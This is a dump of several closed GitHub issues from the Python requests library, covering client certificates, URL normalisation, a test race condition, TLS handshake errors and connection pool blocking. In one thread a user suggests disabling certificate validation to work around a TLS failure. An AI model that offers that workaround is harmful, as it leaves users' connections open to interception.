https://github.com/psf/requests/issues/2405
54,111,802
MDU6SXNzdWU1NDExMTgwMg==
2,405
x509 Certificate
{ "avatar_url": "https://avatars.githubusercontent.com/u/505939?v=4", "events_url": "https://api.github.com/users/kvarga/events{/privacy}", "followers_url": "https://api.github.com/users/kvarga/followers", "following_url": "https://api.github.com/users/kvarga/following{/other_user}", "gists_url": "https://api.github.com/users/kvarga/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kvarga", "id": 505939, "login": "kvarga", "node_id": "MDQ6VXNlcjUwNTkzOQ==", "organizations_url": "https://api.github.com/users/kvarga/orgs", "received_events_url": "https://api.github.com/users/kvarga/received_events", "repos_url": "https://api.github.com/users/kvarga/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kvarga/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kvarga/subscriptions", "type": "User", "url": "https://api.github.com/users/kvarga", "user_view_type": "public" }
[]
closed
true
null
[]
null
5
2015-01-12T21:50:24Z
2021-09-08T23:06:13Z
2015-01-12T22:25:22Z
NONE
resolved
Is there any support for x509 certificate authentication with requests? I can't seem to find any examples and would much prefer to use requests.
{ "avatar_url": "https://avatars.githubusercontent.com/u/505939?v=4", "events_url": "https://api.github.com/users/kvarga/events{/privacy}", "followers_url": "https://api.github.com/users/kvarga/followers", "following_url": "https://api.github.com/users/kvarga/following{/other_user}", "gists_url": "https://api.github.com/users/kvarga/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kvarga", "id": 505939, "login": "kvarga", "node_id": "MDQ6VXNlcjUwNTkzOQ==", "organizations_url": "https://api.github.com/users/kvarga/orgs", "received_events_url": "https://api.github.com/users/kvarga/received_events", "repos_url": "https://api.github.com/users/kvarga/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kvarga/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kvarga/subscriptions", "type": "User", "url": "https://api.github.com/users/kvarga", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2405/reactions" }
https://api.github.com/repos/psf/requests/issues/2405/timeline
null
completed
null
null
false
[ "By which you mean TLS authentication? Yes, it's enabled by default.\n", "I apologise, I may have misread. Do you mean TLS _client_ certificates?\n", "Yeah, sorry. I'm piecing together some horrible documentation from our vendor. The example app they gave is corrupted so awaiting that back. The language from documentation that I do have is\n\n> In addition to using the certificate to establish the SSL connection, your system will need to use a client key and secret to authenticate to the APIs.\n", "Ok, so we can use client certificates. You use the `cert` keyword as documented [here](http://docs.python-requests.org/en/latest/api/#requests.request).\n", "Awesome. Thanks!\n" ]
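As the thread above notes, requests exposes TLS client certificates through the `cert` keyword (e.g. `requests.get(url, cert=('client.crt', 'client.key'))`). Under the hood that corresponds to loading a certificate/key pair into the client's SSL context; a stdlib-level sketch of the same mechanism (the file paths are placeholders, not real files):

```python
import ssl

def client_context(certfile=None, keyfile=None):
    # Verify the server, as requests does by default (verify=True).
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
    if certfile is not None:
        # Present our own certificate to the server for client
        # authentication; this is what cert=('client.crt', 'client.key')
        # maps to at the TLS layer.
        ctx.load_cert_chain(certfile, keyfile)
    return ctx
```

With requests you never build this context yourself; passing the `cert` tuple (or a single combined PEM path) to the request call or to `Session.cert` is enough.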
https://api.github.com/repos/psf/requests/issues/2404
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2404/labels{/name}
https://api.github.com/repos/psf/requests/issues/2404/comments
https://api.github.com/repos/psf/requests/issues/2404/events
https://github.com/psf/requests/issues/2404
53,957,330
MDU6SXNzdWU1Mzk1NzMzMA==
2,404
requests removes characters from valid url
{ "avatar_url": "https://avatars.githubusercontent.com/u/4533323?v=4", "events_url": "https://api.github.com/users/NikolaiT/events{/privacy}", "followers_url": "https://api.github.com/users/NikolaiT/followers", "following_url": "https://api.github.com/users/NikolaiT/following{/other_user}", "gists_url": "https://api.github.com/users/NikolaiT/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/NikolaiT", "id": 4533323, "login": "NikolaiT", "node_id": "MDQ6VXNlcjQ1MzMzMjM=", "organizations_url": "https://api.github.com/users/NikolaiT/orgs", "received_events_url": "https://api.github.com/users/NikolaiT/received_events", "repos_url": "https://api.github.com/users/NikolaiT/repos", "site_admin": false, "starred_url": "https://api.github.com/users/NikolaiT/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/NikolaiT/subscriptions", "type": "User", "url": "https://api.github.com/users/NikolaiT", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-10T12:52:12Z
2021-09-08T23:06:13Z
2015-01-10T13:10:21Z
NONE
resolved
Requests strips the question mark when a hash tag follows. urlopen doesn't do it. Why? Recreate bug with: ``` python #!/usr/bin/python3 from urllib.request import urlopen from requests import get url = 'http://incolumitas.com?#param=value' native = urlopen(url) req = get(url) assert native.url == req.url, '{} vs {}'.format(native.url, req.url) """ AssertionError: http://incolumitas.com?#param=value vs http://incolumitas.com/#param=value Requests strips the question mark when a hash tag follows. urlopen doesn't do it. Why? """ ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/4533323?v=4", "events_url": "https://api.github.com/users/NikolaiT/events{/privacy}", "followers_url": "https://api.github.com/users/NikolaiT/followers", "following_url": "https://api.github.com/users/NikolaiT/following{/other_user}", "gists_url": "https://api.github.com/users/NikolaiT/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/NikolaiT", "id": 4533323, "login": "NikolaiT", "node_id": "MDQ6VXNlcjQ1MzMzMjM=", "organizations_url": "https://api.github.com/users/NikolaiT/orgs", "received_events_url": "https://api.github.com/users/NikolaiT/received_events", "repos_url": "https://api.github.com/users/NikolaiT/repos", "site_admin": false, "starred_url": "https://api.github.com/users/NikolaiT/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/NikolaiT/subscriptions", "type": "User", "url": "https://api.github.com/users/NikolaiT", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2404/reactions" }
https://api.github.com/repos/psf/requests/issues/2404/timeline
null
completed
null
null
false
[ "The question mark indicates the beginning of the query portion of the URL. The octothorpe indicates the beginning of the fragment portion of the URL. We conclude that you have an empty query string and normalise it by removing the section entirely.\n\nIf the octothorpe is intended to be part of the query string you need to percent-encode it to avoid ambiguity. \n\n> On 10 Jan 2015, at 12:52, NikolaiT [email protected] wrote:\n> \n> Requests strips the question mark when a hash tag follows. urlopen doesn't do it. Why?\n> \n> Recreate bug with:\n> \n> #!/usr/bin/python3\n> \n> from urllib.request import urlopen\n> from requests import get\n> \n> url = 'http://incolumitas.com?#param=value'\n> \n> native = urlopen(url)\n> req = get(url)\n> \n> assert native.url == req.url, '{} vs {}'.format(native.url, req.url)\n> \n> \"\"\"\n> AssertionError: http://incolumitas.com?#param=value vs http://incolumitas.com/#param=value\n> \n> Requests strips the question mark when a hash tag follows. urlopen doesn't do it. Why?\n> \"\"\"\n> —\n> Reply to this email directly or view it on GitHub.\n", "I understand. Many thanks for the quick response. Will close.\n", "@NikolaiT just to give you some more detail about this:\n\nThe URI structure (that URLs follow) is of the form `{scheme}://{authority}{/path}{?query}{#fragment}`. (On Python 3) The `urllib.parse` module gives us the `urlparse` function to look at these components of a URL.\n\n``` py\n>>> import urllib.parse\n>>> uri = urllib.parse.urlparse('http://incolumitas.com?#param=value')\n>>> uri\nParseResult(scheme='http', netloc='incolumitas.com', path='', params='', query='', fragment='param=value')\n>>> uri.geturl()\n'http://incolumitas.com#param=value'\n```\n\nAccording to this module (and the RFC that defines handling of URIs) these two URLs are equivalent. This can be seen by visiting both in your browser. In essence, if we didn't modify the URL it would be as valid as our current approach is. 
We do normalize URLs though because servers (and sometimes users) give us some rather bizarre URLs that will only \"just work\" when normalized. As core developers of a library whose core design goal is to make users' lives better, we need to take this approach to satisfy that goal.\n\nI hope that helps give you a deeper understanding of what's happening, why it is okay, and why it _should_ happen.\n" ]
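The normalization described in the thread above can be reproduced with the stdlib parser alone: the bare `?` parses as an empty query and drops out on round-trip, while percent-encoding the octothorpe keeps it inside the query, as suggested:

```python
from urllib.parse import urlparse, quote

# '?#param=value' parses as an empty query plus a fragment...
parts = urlparse('http://incolumitas.com?#param=value')
assert parts.query == '' and parts.fragment == 'param=value'

# ...so the round-tripped URL legitimately loses the bare '?'.
assert parts.geturl() == 'http://incolumitas.com#param=value'

# To make '#param=value' part of the query instead, percent-encode the '#':
encoded = 'http://incolumitas.com?' + quote('#param=value', safe='=')
assert urlparse(encoded).query == '%23param=value'
```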
https://api.github.com/repos/psf/requests/issues/2403
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2403/labels{/name}
https://api.github.com/repos/psf/requests/issues/2403/comments
https://api.github.com/repos/psf/requests/issues/2403/events
https://github.com/psf/requests/issues/2403
53,785,849
MDU6SXNzdWU1Mzc4NTg0OQ==
2,403
Provide a way for all existing connections to be discarded
{ "avatar_url": "https://avatars.githubusercontent.com/u/116235?v=4", "events_url": "https://api.github.com/users/cameron314/events{/privacy}", "followers_url": "https://api.github.com/users/cameron314/followers", "following_url": "https://api.github.com/users/cameron314/following{/other_user}", "gists_url": "https://api.github.com/users/cameron314/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/cameron314", "id": 116235, "login": "cameron314", "node_id": "MDQ6VXNlcjExNjIzNQ==", "organizations_url": "https://api.github.com/users/cameron314/orgs", "received_events_url": "https://api.github.com/users/cameron314/received_events", "repos_url": "https://api.github.com/users/cameron314/repos", "site_admin": false, "starred_url": "https://api.github.com/users/cameron314/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/cameron314/subscriptions", "type": "User", "url": "https://api.github.com/users/cameron314", "user_view_type": "public" }
[]
closed
true
null
[]
null
6
2015-01-08T18:49:58Z
2021-09-08T23:06:14Z
2015-01-08T21:21:44Z
NONE
resolved
As I gather from various web searches, there's currently no way to manage the underlying TCP connections directly, since they're supposed to "just work" and be auto-recycled, etc. However, I have found one use case where this is not enough, and the sanest way to make it work would be to instruct `requests` to discard all open connections. Here's the use case: I have a web API I've written that I'd like to test using `requests`. Each test case starts a new instance of the API server, runs the test code, then stops the server. Because the tests run in quick succession, there's a race condition between the time the server exits (and Linux cleans up the socket) and the time that `requests` sees that the connection was closed. So, when the second test runs and starts a new instance of the server, `requests` thinks it can reuse the previous connection, which then fails (throws an exception) because the remote socket no longer exists. This is not really the fault of `requests` (technically the behaviour is correct -- the connection _was_ closed, after all), but this lack of control on the client side of the connection in the face of asynchronous cleanup makes it difficult to do these types of connection tests. There are many workarounds I could use (currently I've inserted a sleep of 75ms between test runs, which works, as does using a different port for each test, or reusing the same instance of the server for all tests). But none of them are very elegant. Note that this doesn't happen on Windows, for some reason, only Linux (Fedora 21). 
Sample exception from the second test case (if I don't sleep): ``` Traceback (most recent call last): File "tests.py", line 52, in setUp requests.get(api, cookies=cookies) File "/usr/lib/python2.7/site-packages/requests-2.5.0-py2.7.egg/requests/api.py", line 65, in get return request('get', url, **kwargs) File "/usr/lib/python2.7/site-packages/requests-2.5.0-py2.7.egg/requests/api.py", line 49, in request response = session.request(method=method, url=url, **kwargs) File "/usr/lib/python2.7/site-packages/requests-2.5.0-py2.7.egg/requests/sessions.py", line 461, in request resp = self.send(prep, **send_kwargs) File "/usr/lib/python2.7/site-packages/requests-2.5.0-py2.7.egg/requests/sessions.py", line 573, in send r = adapter.send(request, **kwargs) File "/usr/lib/python2.7/site-packages/requests-2.5.0-py2.7.egg/requests/adapters.py", line 415, in send raise ConnectionError(err, request=request) ConnectionError: ('Connection aborted.', error(111, 'Connection refused')) ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/116235?v=4", "events_url": "https://api.github.com/users/cameron314/events{/privacy}", "followers_url": "https://api.github.com/users/cameron314/followers", "following_url": "https://api.github.com/users/cameron314/following{/other_user}", "gists_url": "https://api.github.com/users/cameron314/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/cameron314", "id": 116235, "login": "cameron314", "node_id": "MDQ6VXNlcjExNjIzNQ==", "organizations_url": "https://api.github.com/users/cameron314/orgs", "received_events_url": "https://api.github.com/users/cameron314/received_events", "repos_url": "https://api.github.com/users/cameron314/repos", "site_admin": false, "starred_url": "https://api.github.com/users/cameron314/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/cameron314/subscriptions", "type": "User", "url": "https://api.github.com/users/cameron314", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2403/reactions" }
https://api.github.com/repos/psf/requests/issues/2403/timeline
null
completed
null
null
false
[ "Hi there! Thanks for this detailed feature request.\n\nBefore we go too far I want to nail down exactly what's going on. Requests only re-uses connections at the scope of a single `Session` object. Given that you're calling `requests.get`, you should _not_ be seeing any connection re-use of any kind. We don't keep a single implicit session floating around. For that reason, I'm inclined to believe your problem is not actually caused by our connection re-use.\n\nIs that analysis correct?\n", "Oho! I thought it automatically reused connections even without a session object.\n\nSo yes, then, your analysis must be correct. I'm at a loss to explain what's happening, then.\n\nI should note that when I run the tests on Windows with Fiddler capturing the traffic, it shows the first request of each test case taking an extra 500ms in the \"TCP/IP Connect\" stage, with subsequent ones (in that test case) taking 0ms. This to me suggests either a caching issue (e.g. DNS -- I had trouble at one point with localhost resolving to IPv6 first and causing a 1s delay on every new request in the same phase, but I \"fixed\" this by forcing localhost to resolve to 127.0.0.1) or connection reuse issue. Perhaps this is being done at a lower level than `requests` itself?\n", "I suspect so.\n\nYour DNS suggestion is a good explanation for the first request being delayed. Assuming you're running the test locally (that is, you're running both the server and test on localhost) that's a compelling explanation: TCP handshake should be <1ms on the loopback interface.\n\nConnection Refused is the error code when the TCP SYN packet is rejected, meaning that no-one is listening on the socket. Is it possible your initial request occurs before the web server has actually started listening on the socket?\n", "Oh -- I just realized where I put the sleep -- in between the process starting and the test starting. 
Obviously the race condition must be between the time the process starts and when the socket is actually bound, as you suggested. Thank you! I feel really stupid now :D\n\nI still don't understand why it works without the delay for the first test, though (which is why I thought it was a lingering old connection ('Connection aborted' pointed in that direction), not a problem with the new one ('Connection refused' points in this one)), or why it always works on Windows. Alas, I guess that's just the nature of race conditions.\n\nSorry for wasting your time! My use case for this feature is completely invalid, it seems, so I'll withdraw the feature request.\n", "It's not a waste of my time, I'm glad you asked. I hope you have success using requests!\n", "Definitely! I remember the \"good\" old days of using urllib2... _shudder_ :-)\n" ]
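The race diagnosed at the end of the thread above (the first request fires before the freshly started server has bound its socket) is usually closed by polling for the port rather than sleeping a fixed 75 ms. A stdlib sketch:

```python
import socket
import time

def wait_for_port(host, port, timeout=5.0):
    """Poll until a TCP connect to (host, port) succeeds, or give up.

    Returns True once the port accepts a connection, False if the
    timeout expires first.
    """
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            with socket.create_connection((host, port), timeout=0.5):
                return True
        except OSError:  # connection refused / port not yet bound
            time.sleep(0.05)
    return False
```

The test's setUp would then start the server process and call something like `wait_for_port('127.0.0.1', port)` before issuing the first `requests.get`, instead of sleeping.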
https://api.github.com/repos/psf/requests/issues/2402
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2402/labels{/name}
https://api.github.com/repos/psf/requests/issues/2402/comments
https://api.github.com/repos/psf/requests/issues/2402/events
https://github.com/psf/requests/issues/2402
53,700,951
MDU6SXNzdWU1MzcwMDk1MQ==
2,402
Allow a 'verbose' flag for raise_for_status()
{ "avatar_url": "https://avatars.githubusercontent.com/u/1808790?v=4", "events_url": "https://api.github.com/users/mrname/events{/privacy}", "followers_url": "https://api.github.com/users/mrname/followers", "following_url": "https://api.github.com/users/mrname/following{/other_user}", "gists_url": "https://api.github.com/users/mrname/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/mrname", "id": 1808790, "login": "mrname", "node_id": "MDQ6VXNlcjE4MDg3OTA=", "organizations_url": "https://api.github.com/users/mrname/orgs", "received_events_url": "https://api.github.com/users/mrname/received_events", "repos_url": "https://api.github.com/users/mrname/repos", "site_admin": false, "starred_url": "https://api.github.com/users/mrname/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/mrname/subscriptions", "type": "User", "url": "https://api.github.com/users/mrname", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-08T00:33:59Z
2018-09-06T12:19:50Z
2015-01-09T21:13:47Z
NONE
resolved
raise_for_status() is super awesome, but a lot of the time, the error code and message are not informative enough to assist with debugging when an exception is raised. It would be nice to have a verbose flag for raise_for_status that would also print the response body, where more details are often included. I would be happy to work on this, but wanted to make sure it is not already in the works.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 5, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 5, "url": "https://api.github.com/repos/psf/requests/issues/2402/reactions" }
https://api.github.com/repos/psf/requests/issues/2402/timeline
null
completed
null
null
false
[ "If you do:\n\n``` py\nimport requests\n\nr = requests.get(url)\n\ntry:\n r.raise_for_status()\nexcept requests.exceptions.HTTPError as error:\n print(error)\n print(error.response.text)\n```\n\nWe don't print the body (and likely won't add it, even as a flag) for several reasons:\n- It may not exist (and therefore wouldn't be helpful)\n- It could be plain binary data which will certainly not help anyone\n- It could have characters that cannot be printed (and will cause even more problems)\n\nYou can certainly do this yourself and based on some searches on StackOverflow and our issues, it doesn't seem like anyone has had the need for this before.\n\nI'm -0.5 if only because `verbose` would obviously default to `False`.\n", "Thanks for the quick response @sigmavirus24. That makes a lot of sense. I was thinking that a verbose flag would avoid the need for the try/except structure, but it is simple enough to a make a little helper function that processes the request and does that. Thanks again! Please go ahead and close this out.\n", "Verbose flag would be very nice" ]
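The try/except pattern suggested in the comments above can be packaged as a small helper. This is a sketch, not part of requests itself: the helper name `raise_for_status_verbose` and the 500-character truncation are my own choices, made to sidestep the concerns raised (missing, binary, or unprintable bodies).

```python
import requests

def raise_for_status_verbose(response):
    """Like Response.raise_for_status(), but append a snippet of the
    response body to the error message to help with debugging."""
    try:
        response.raise_for_status()
    except requests.exceptions.HTTPError as error:
        # Truncate: the body may be large, binary, or absent entirely.
        snippet = response.text[:500]
        raise requests.exceptions.HTTPError(
            "%s\nResponse body: %s" % (error, snippet),
            response=response,
        )
```

Because this lives in application code rather than in requests, it can make assumptions (text body, reasonable size) that a library default could not.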
https://api.github.com/repos/psf/requests/issues/2401
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2401/labels{/name}
https://api.github.com/repos/psf/requests/issues/2401/comments
https://api.github.com/repos/psf/requests/issues/2401/events
https://github.com/psf/requests/issues/2401
53,515,560
MDU6SXNzdWU1MzUxNTU2MA==
2,401
Problems in SSL communication
{ "avatar_url": "https://avatars.githubusercontent.com/u/10159045?v=4", "events_url": "https://api.github.com/users/tesande/events{/privacy}", "followers_url": "https://api.github.com/users/tesande/followers", "following_url": "https://api.github.com/users/tesande/following{/other_user}", "gists_url": "https://api.github.com/users/tesande/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/tesande", "id": 10159045, "login": "tesande", "node_id": "MDQ6VXNlcjEwMTU5MDQ1", "organizations_url": "https://api.github.com/users/tesande/orgs", "received_events_url": "https://api.github.com/users/tesande/received_events", "repos_url": "https://api.github.com/users/tesande/repos", "site_admin": false, "starred_url": "https://api.github.com/users/tesande/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/tesande/subscriptions", "type": "User", "url": "https://api.github.com/users/tesande", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-06T13:41:58Z
2021-09-08T23:00:46Z
2015-01-06T14:09:04Z
NONE
resolved
Hi again! This issue is related to the closed issue #2383. I have now investigated further. I have tried a different client against the server, and that communication works fine. I have used Wireshark to see how the handshake goes. With the Java client things work out fine, but when using requests, the connection terminates with an Encrypted Alert after the Change Cipher Spec. When I look at the protocol in Wireshark, I see TLSv1 even if I change the protocol using the SSLAdapter in the requests_toolbelt. Is this correct? I use OpenSSL 1.0.1h 5 Jun 2014. Could it be wise to try a different OpenSSL version? Which version is compatible with requests version 2.5.1? Regards Tor Erik
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2401/reactions" }
https://api.github.com/repos/psf/requests/issues/2401/timeline
null
completed
null
null
false
[ "requests can and does use whatever version of OpenSSL Python is compiled against. There is no bug in requests from what I can tell and the SSLAdapter in `requests_toolbelt` just works for me on both OpenSSL 1.0.1 and 0.9.8. If you need help with your code, please post your question on [StackOverflow](https://stackoverflow.com/questions/tagged/python-requests) with the code you're using and having problems with. The issue tracker is not a support forum.\n", "Hi @tesande , were you able to resolve the issue. I have a similar case where I have a server accepting tlsv1 and client using a request adapter with tlsv1. \nMy gunicorn server config \nkeyfile = '/path/to/keyfile'\ncertfile = '/path/to/certfile'\nca_certs = '/path/to/ca/cert'\ncert_reqs = ssl.CERT_OPTIONAL\nssl_version = ssl.PROTOCOL_TLSv1\ndo_handshake_on_connect = True\n\nMy client code looks like this:\nrequests_session = requests.Session()\nrequests_session.mount('https://', TLSAdapter)\nresp = requests.request(request.http_method, request.full_uri, data=request.data, headers=request_headers, verify=verify, cert=(cert, key))\n\n// tlsv1 adapter\nclass TLSAdapter(HTTPAdapter):\n def init_poolmanager(self, connections, maxsize, block=False):\n self.poolmanager = PoolManager(num_pools=connections,\n maxsize=maxsize,\n block=block,\n ssl_version=ssl.PROTOCOL_TLSv1)\n\nI get this\nTransportException: TransportException : <urlopen error [Errno 1] _ssl.c:493: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol>\n\nGoing into server logs, I also find these:\n _ssl.c:493: error:1408F10B:SSL routines:SSL3_GET_RECORD:wrong version number\n", "Hi!\n\nMy web server version was from 2003. After updating, things worked fine.\n\nHowever, if you don't need certification validation, you can turn that off. 
That might solve your problem\n\nDate: Fri, 17 Jul 2015 14:01:21 -0700\nFrom: [email protected]\nTo: [email protected]\nCC: [email protected]\nSubject: Re: [requests] Problems in SSL communication (#2401)\n\nHi @tesande , were you able to resolve the issue. I have a similar case where I have a server accepting tlsv1 and client using a request adapter with tlsv1. \n\nMy gunicorn server config \n\nkeyfile = '/path/to/keyfile'\n\ncertfile = '/path/to/certfile'\n\nca_certs = '/path/to/ca/cert'\n\ncert_reqs = ssl.CERT_OPTIONAL\n\nssl_version = ssl.PROTOCOL_TLSv1\n\ndo_handshake_on_connect = True\n\nMy client code looks like this:\n\nrequests_session = requests.Session()\n\nrequests_session.mount('https://', TLSAdapter)\n\nresp = requests.request(request.http_method, request.full_uri, data=request.data, headers=request_headers, verify=verify, cert=(cert, key))\n\n// tlsv1 adapter\n\nclass TLSAdapter(HTTPAdapter):\n\n def init_poolmanager(self, connections, maxsize, block=False):\n\n```\nself.poolmanager = PoolManager(num_pools=connections,\n\n maxsize=maxsize,\n\n block=block,\n\n ssl_version=ssl.PROTOCOL_TLSv1)\n```\n\nI get this\n\nTransportException: TransportException : \n\nGoing into server logs, I also find these:\n\n _ssl.c:493: error:1408F10B:SSL routines:SSL3_GET_RECORD:wrong version number\n\n—\nReply to this email directly or view it on GitHub.\n" ]
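A cleaned-up version of the transport-adapter approach quoted in the comment above. This is a sketch only: it pins the pool to TLS 1.2 rather than the TLS 1.0 used in the original discussion (ssl.PROTOCOL_TLSv1 is deprecated in modern ssl modules), and the class name `TLS12Adapter` is arbitrary.

```python
import ssl

import requests
from requests.adapters import HTTPAdapter
from urllib3.poolmanager import PoolManager

class TLS12Adapter(HTTPAdapter):
    """Transport adapter that forces a specific TLS version for every
    connection made through the pools it manages."""

    def init_poolmanager(self, connections, maxsize, block=False, **kwargs):
        self.poolmanager = PoolManager(
            num_pools=connections,
            maxsize=maxsize,
            block=block,
            ssl_version=ssl.PROTOCOL_TLSv1_2,  # pin the protocol here
            **kwargs
        )

session = requests.Session()
session.mount("https://", TLS12Adapter())
```

Mounting the adapter on the session (rather than passing options per request) means every `https://` request through that session inherits the pinned protocol.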
https://api.github.com/repos/psf/requests/issues/2400
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2400/labels{/name}
https://api.github.com/repos/psf/requests/issues/2400/comments
https://api.github.com/repos/psf/requests/issues/2400/events
https://github.com/psf/requests/issues/2400
53,473,702
MDU6SXNzdWU1MzQ3MzcwMg==
2,400
Using requests session with pool_block=True blocks indefinitely for name resolution errors
{ "avatar_url": "https://avatars.githubusercontent.com/u/1521409?v=4", "events_url": "https://api.github.com/users/sinank/events{/privacy}", "followers_url": "https://api.github.com/users/sinank/followers", "following_url": "https://api.github.com/users/sinank/following{/other_user}", "gists_url": "https://api.github.com/users/sinank/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sinank", "id": 1521409, "login": "sinank", "node_id": "MDQ6VXNlcjE1MjE0MDk=", "organizations_url": "https://api.github.com/users/sinank/orgs", "received_events_url": "https://api.github.com/users/sinank/received_events", "repos_url": "https://api.github.com/users/sinank/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sinank/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sinank/subscriptions", "type": "User", "url": "https://api.github.com/users/sinank", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2015-01-06T02:26:42Z
2021-09-08T23:05:46Z
2015-04-07T13:42:49Z
NONE
resolved
I am using a requests session pool in my code since we make a large number of HTTP requests. We recently ran into an issue where temporary name resolution errors blocked the process from making any more HTTP requests since the pool was full. I have pasted a quick script to reproduce the issue below. ``` from requests import Request, Session import requests import gevent from gevent import monkey monkey.patch_all() urltotest = 'http://thisisanunresolvablesite.com/foo' MAX_CONC_REQUESTS_PER_CONNECTION = 21 MAX_POOLS = 1 MAX_CONC_REQUESTS = 5 # Requests session pool http_pool = None def get_requests_session(): global http_pool if not http_pool: http_pool = Session() adapter = requests.adapters.HTTPAdapter( pool_connections=MAX_POOLS, pool_maxsize=MAX_CONC_REQUESTS, pool_block=True) http_pool.mount('http://', adapter) http_pool.mount('https://', adapter) return http_pool def send_request_in_greenlet(i): try: prepped = Request('GET', urltotest).prepare() session = get_requests_session() print 'Sending request #', i resp = session.send(prepped) body = str(resp.content) status = str(resp.status_code) print 'Reponse for request # %d - Status: %s' % (i, status) except Exception as ex: print ex i = 0 while i < 20: i += 1 gevent.spawn(send_request_in_greenlet, i) try: gevent.sleep(100) except KeyboardInterrupt: pass ``` The error seems to stem from the urlopen method in packages/urllib3/connectionpool.py: ``` ... except (TimeoutError, HTTPException, SocketError) as e: if conn: # Discard the connection for these exceptions. It will be # be replaced during the next _get_conn() call. conn.close() conn = None ... finally: if release_conn: # Put the connection back to be reused. If the connection is # expired then it will be None, which will get replaced with a # fresh connection during _get_conn. self._put_conn(conn) ``` I am not sure that this issue should be filed under urllib3 or requests. Apologizing in advance if I posted this at the wrong place.
